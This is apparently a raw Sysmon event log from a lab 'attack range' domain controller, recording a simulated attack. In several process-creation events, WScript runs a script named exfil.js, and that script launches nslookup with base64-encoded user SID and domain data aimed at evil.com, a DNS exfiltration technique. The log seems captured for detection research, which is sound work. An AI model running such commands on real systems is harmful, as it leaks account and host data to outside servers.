14:21:51.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6D46-000000005F02}2788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6C46-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.721{2E1864BB-18E0-629A-6742-000000005F02}39761144C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6C46-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.724{2E1864BB-18FF-629A-6C46-000000005F02}7808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjbn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.705{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxjy.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-18FF-629A-6A46-000000005F02}79648048C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6B46-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6B46-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.683{2E1864BB-18FF-629A-6946-000000005F02}70521300C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-6B46-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.688{2E1864BB-18FF-629A-6B46-000000005F02}3868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6946-000000005F02}7052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxjy.tmp 2>&1 10341000x8000000000000000215773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.668{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6A46-000000005F02}7964C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.668{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6A46-000000005F02}7964C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.652{2E1864BB-18FF-629A-6A46-000000005F02}79648048C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6946-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.652{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6A46-000000005F02}7964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6946-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-18E0-629A-6742-000000005F02}39765968C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6946-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.650{2E1864BB-18FF-629A-6946-000000005F02}7052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxjy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.636{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgyzws.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-18FF-629A-6746-000000005F02}56246200C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6846-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 